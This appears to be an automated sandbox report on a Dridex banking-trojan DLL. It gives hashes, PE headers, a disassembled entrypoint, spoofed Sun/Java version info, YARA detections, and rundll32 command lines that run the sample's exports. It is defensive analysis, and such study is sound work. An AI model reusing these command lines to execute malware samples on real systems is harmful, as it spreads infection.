SHA-512:	3CB1B057C553274CC0AFC243B080CB952898589B6839A6F776D8879C5E5E51051D8DED7A3262228100B574FFBFD2EBCCC5C4D4C4716C5F5A86F23CA522CC3003
Malicious:	false
Preview:	MDMP....... .........za............d...............l............*..........T.......8...........T...............P{...........................................................................................U...........B..............GenuineIntelW...........T.............za.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DB6.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8352
Entropy (8bit):	3.6962577194915953
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiMh66X6YYrY6ppgmfTOSZXECprRH89b2wtsfo02m:RrlsNi666X6Y76ppgmfTOSrYpmfh
MD5:	09585E8AC18CA1B0033EB262AE925DB4
SHA1:	0D9CAE7B9D173E5A43F988595B30E74C2F269522
SHA-256:	28A7B5BA3336E9D5132C0F7EF1244964706E503A20BD5D0A1C954542DE910360
SHA-512:	89344D2741159AD49F08A09DEB936B812E8CCC7CCEC6CFF410C673A5E63DCA995DBA5DDD9A76A0B1213A09D7B440025A1930F914559EEAB5C38671A8A46A8314
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7131.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4696
Entropy (8bit):	4.5046486653392535
Encrypted:	false
SSDEEP:	48:cvIwSD8zs7+JgtWI9SkrWSC8B98fm8M4JCdsmpFYv+q8/1DO4SrSVd:uITf701FSNMJ00vECDWVd
MD5:	DA7904AF1ABA14728E1D939F23AF1AF9
SHA1:	50CCE2696E5CA67733E022D9D55BEE72F474BD1C
SHA-256:	1F13D44F837F94CE8B71AC1C059EC4EC944B5B6D64C7A8CCB60DA8F13E4559AF
SHA-512:	00DB8286A3F47F2256FCB0996995998355E793149535D5B95048DC782330306813489F729AE11E34152C4C846D0D5C9CDFF6A671A0D6DBEE757E0E9308540C25
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1229608" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER768F.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8352
Entropy (8bit):	3.698285676014007
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNivQ6n6YYre6ppgmfTtSZXECprRt89b2Pksfz0fm:RrlsNio6n6YN6ppgmfTtSrK2XfX
MD5:	DC7F527257F91360B545730F06FAABCD
SHA1:	70A3604AAC6ABF2C968C7D6579D303B4C7C92599
SHA-256:	F396415ED5717A6005EC6853B6D48554EF93C3102BDBF76D3F1B71C21691A43F
SHA-512:	7D672486651D6F1E91E34A2D43616DC5BDBD1BEDA7A40A739578F88CF3AF8E40B0D96D8CC178971F512A2E82A74A5540F64D74039A24F30F0FA8732FE5D37960
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D28.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4696
Entropy (8bit):	4.505966922915317
Encrypted:	false
SSDEEP:	48:cvIwSD8zs7+JgtWI9SkrWSC8B58fm8M4JCdsmYFus4+q8/1DSu4SrSy6d:uITf701FSNcJ0s4EWuDWy6d
MD5:	907F392A9030B8289FE729AAE7A3CE6B
SHA1:	BB8D390E1D325114C2FEB4578A0615168FF90EAB
SHA-256:	A4D890A2AFC57D53CC57E8E0E89014B1FC8A37A3E3B1F4065BA92A05EC842205
SHA-512:	2F73B2B2A471EA7D9C0EDD3E6A26FC95E2335C6E17B97B7A558FBF9EF1125C7A4BDE72C35140D68B6D3A2F1B8AE27A4B82D40E52CC04E6C34FB3376A8179DB12
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1229608" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D94.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8352
Entropy (8bit):	3.695325784298672
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNix06T76YYrz6ppgmfT5SZXECprz89b2U8sft0Cm:RrlsNiC6P6Yw6ppgmfT5SWNPfI
MD5:	012C49EB65729BE5D6DABA5A8179BFDC
SHA1:	371270CCC6F15E68668A31D1DB2A6A8F8414B8A5
SHA-256:	9888583FB03961D1B1306D844728D035899C7B0AEF6CE125E4CAD727E8EDD8C8
SHA-512:	341A5F5E7C5B6008C8C78F8B76161997BD6F09574693A1E45C29BFAB8804F19D868FCF92748796D583083148445393C315FCC9894DFB424815259FD78EDF2F14
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.5.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER81DB.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4696
Entropy (8bit):	4.502353144285801
Encrypted:	false
SSDEEP:	48:cvIwSD8zs7+JgtWI9SkrWSC8Bv8fm8M4JCdsmcFk+q8/1DZJ4SrSRd:uITf701FSNWJ05EPDWRd
MD5:	43FEBBFD677E2C67D87CDD3A92A3E8FA
SHA1:	42CC666DBF0EB7A36CD884D5999491D6C3C449D8
SHA-256:	D00A459F2A8228DB9D57CA7EFEFBE9740224EA7A94D577176557BDEB6BE8417F
SHA-512:	3488AB796C0C9EF6ACFEBFC1F63242499205063F358FA0E408B4BEB724199899FF8DE1FA0DCAC1424B52A51994061F886686F403E2AB8E23D7D36DE91290DD60
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1229608" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Temp\WERDE3.tmp.WERDataCollectionStatus.txt Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	4878
Entropy (8bit):	3.2564303290467054
Encrypted:	false
SSDEEP:	96:pwpwi+kXkkX4kj0uWn0Q50Qu0Qga0QXm0QIO0QjiFg+XQYszeuzSzbxGQI5UhmNc:pTlZZuqEGWoeyOkNKgtIJ
MD5:	39F254F5A4E96785B1604BB50699C1F8
SHA1:	D973C28A1868F1930451DCC95BC7469098BDAAD2
SHA-256:	8F10F8E17D8EB791E53D5812533CB1BFE6C359BF02320CF465A685ACCFE9F256
SHA-512:	CEABA9EF8E7489025B76BC064752AAA5C26801F7CC29066F4067485746508B6DE935F443FC9A542124E8ACDA483E716670E989D087D53D620B6FC97988D97B41
Malicious:	false
Preview:	......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.9./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .4.3.6.5.6. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .1.0.9.7.2. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .2. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .1.6.6.4. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .1.2.1.5.5.0.7.5.2. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . .

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.160650328982938
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll
File size:	1093632
MD5:	345eadc8b1f5d0b373b531902c06572e
SHA1:	a0a170c3bf53be55a625c7793bfe23edd4038f05
SHA256:	31bcae869dbae8bfd20fc177bf4158e75fc7fdf00c694ae13f23dff6229f8e8e
SHA512:	88573788ffb297007445449b45075e70e10f92a787954163ce74e4aa099d984530929f27f5c1c23e27e595e096831d10dcaf07ee39aaad6803f839047f8096c6
SSDEEP:	24576:ojsXggYiykQsMy2GSuCAaimSQws2yyq+YoWEUK6ES0wOyeSGwswWquEQq2GiMciB:d
File Content Preview:	MZ......................@........................................IZ..(4..(4..(4..z..&)4.....Z)4..Q...)4..u5..(4.....K(4..v6."(4.7....(4. ...,(4.....i(4.....Z(4..(5.f)4.Rich.(4.........................PE..L...&.ya...........!.... `...P.......K.......p.....

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10004b90
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61798526 [Wed Oct 27 16:58:14 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	ae858e1bcf44b240b65263bbd6945db2

Entrypoint Preview

Instruction
mov eax, dword ptr [10106128h]
call eax
mov edx, eax
ret
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push ebx
push edi
push esi
and esp, FFFFFFF8h
sub esp, 000000A8h
mov eax, dword ptr [ebp+08h]
mov dword ptr [esp+0000009Ch], 008A6C3Fh
mov byte ptr [esp+00000083h], 00000072h
mov dword ptr [esp+6Ch], 6C57D91Ch
mov dword ptr [esp+00000094h], 00000000h
mov dword ptr [esp+00000090h], 0093F6B2h
mov ecx, dword ptr [ebp+08h]
mov edx, esp
mov dword ptr [edx], ecx
mov dword ptr [esp+38h], eax
call 00007FE48C7E6272h
movzx ecx, word ptr [esp+000000A2h]
mov si, cx
mov word ptr [esp+000000A2h], B4E5h
mov byte ptr [esp+37h], al
mov dword ptr [esp+30h], ecx
mov word ptr [esp+2Eh], si
call 00007FE48C7E65EBh
mov ecx, dword ptr [esp+0000008Ch]
mov edx, ecx
add edx, DE3924BAh
mov dword ptr [esp+0000008Ch], edx
mov dword ptr [esp+70h], eax
mov eax, dword ptr [esp+30h]
add eax, eax
mov si, ax
mov word ptr [esp+000000A2h], si
mov eax, dword ptr [esp+70h]
mov edx, dword ptr [esp+00000090h]
mov edi, dword ptr [esp+00000094h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xfad60	0x5f	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xfae3c	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x108000	0x3e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x109000	0x2a38	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x705c	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x44	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5dfe	0x6000	False	0.384562174479	data	4.44056461685	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0xf4032	0xf5000	False	0.135153260523	data	7.11996208116	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xfc000	0xbd1c	0xb000	False	0.234153053977	data	5.69509557044	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x108000	0x3e8	0x1000	False	0.119873046875	data	1.03136554304	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x109000	0x2e14	0x3000	False	0.231608072917	data	5.67874721692	IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x108060	0x388	data

Imports

DLL	Import
SHELL32.dll	SHGetDesktopFolder
IPHLPAPI.DLL	GetIfTable
ADVAPI32.dll	RegOverridePredefKey
msvcrt.dll	memset
OLEAUT32.dll	VarR4FromI2
KERNEL32.dll	CreateFileW, GetModuleFileNameW
SETUPAPI.dll	SetupDiEnumDeviceInfo
USER32.dll	ShowOwnedPopups

Exports

Name	Ordinal	Address
FFRgpmdlwwWde	1	0x100fadb0

Version Infos

Description	Data
LegalCopyright	Copyright 2004
InternalName	ddlb
FileVersion	5.2.00.0
Full Version	5.2.0_00-b00
CompanyName	Sun Microsystems, Inc.
ProductName	Ddlb(EA) 2 Tsyfezyt Bidibhex Ernseqa 5.0 Urdate 6
ProductVersion	5.2.00.0
FileDescription	Java(TM) 2 Platform Standard Edition binary
OriginalFilename	ddlb.dll
Translation	0x0000 0x04b0

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 3104 Parent PID: 3120

General

Start time:	05:15:24
Start date:	28/10/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll'
Imagebase:	0xe40000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000000.686620423.000000006E9E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 4784 Parent PID: 3104

General

Start time:	05:15:24
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6416 Parent PID: 3104

General

Start time:	05:15:24
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll,FFRgpmdlwwWde
Imagebase:	0xfe0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.412312975.000000006E9E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6408 Parent PID: 4784

General

Start time:	05:15:24
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',#1
Imagebase:	0xfe0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5884 Parent PID: 3104

General

Start time:	05:16:19
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',CheckTrust
Imagebase:	0xfe0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000008.00000002.692811464.000000006E9E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6256 Parent PID: 3104

General

Start time:	05:16:19
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',DllCanUnloadNow
Imagebase:	0xfe0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000009.00000000.630165009.000000006E9E1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000009.00000000.610084790.000000006E9E1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000009.00000002.659636393.000000006E9E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3192 Parent PID: 3104

General

Start time:	05:16:20
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',DllGetClassObject
Imagebase:	0xfe0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000A.00000000.620992103.000000006E9E1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000A.00000002.682477446.000000006E9E1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000A.00000000.653774914.000000006E9E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6488 Parent PID: 3104

General

Start time:	05:16:20
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',DownloadFile
Imagebase:	0xfe0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
